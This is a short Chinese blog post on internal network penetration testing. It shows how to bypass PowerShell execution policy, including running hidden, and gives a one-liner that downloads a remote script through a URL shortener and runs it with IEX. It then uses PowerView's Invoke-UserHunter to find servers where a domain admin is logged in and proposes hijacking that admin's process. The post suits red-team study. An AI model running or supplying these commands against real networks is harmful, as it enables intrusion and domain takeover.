Powershell寻找域管在线服务器

记录线下Powershell在域环境中对于服务器的信息收集

Powershell的脚本有很多,在内网渗透测试中不仅能扫,能爆,能转发,还能做更多的事情。我们常用的脚本有Powersploit,Empire,PowerView等等。

 

使用脚本之前,我们先科普下计算机上的执行策略,输入下面命令。

get-executionpolicy

  • Restricted------默认的设置,不允许任何script运行

  • AllSigned-------只能运行经过数字证书签名的script

  • RemoteSigned----运行本地的script不需要数字签名,但是运行从网络上下载的script就必须要有数字签名

  • Unrestricted----允许所有的script运行

 

可以看到执行策略是默认的设置,不允许执行任何脚本,在执行之前我们需要更改下ps的执行策略,

将Restricted策略改成Unrestricted,而修改此策略必须要管理员权限,所以这里就需要采用一些方法绕过策略来执行脚本。有下面三种方法。

 

  • 本地权限绕过执行

PowerShell.exe -ExecutionPolicy Bypass -File xxx.ps1
  • 本地隐藏权限绕过执行脚本

PowerShell.exe -ExecutionPolicy Bypass -NoLogo -Nonlnteractive -NoProfile -WindowStyle Hidden
  • 用IEX下载远程PS1脚本回来权限绕过执行

powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI');Invok

这里我们先使用powerview脚本来获取当前域管理员在线登录的服务器,我们将powerview脚本的Invoke-UserHunter模块上传主机名pavmsep131,IP为10.51.0.131的服务器中,然后使用命令Invoke-UserHunter。

具体命令如下:

powershell.exe -exec bypass -Command "&{Import-Module .\powerview.ps1;Invoke-UserHunter}"

可以看到域管理员当前在线登陆的机器为主机名PAVMSXD30,ip为10.51.0.30的服务器,此时我们需要入侵此服务器然后迁移到域管理登陆所在的进程,便拥有了域管理的权限。

 

posted @ 2019-03-13 21:39  卿先生  阅读(1159)  评论(0编辑  收藏  举报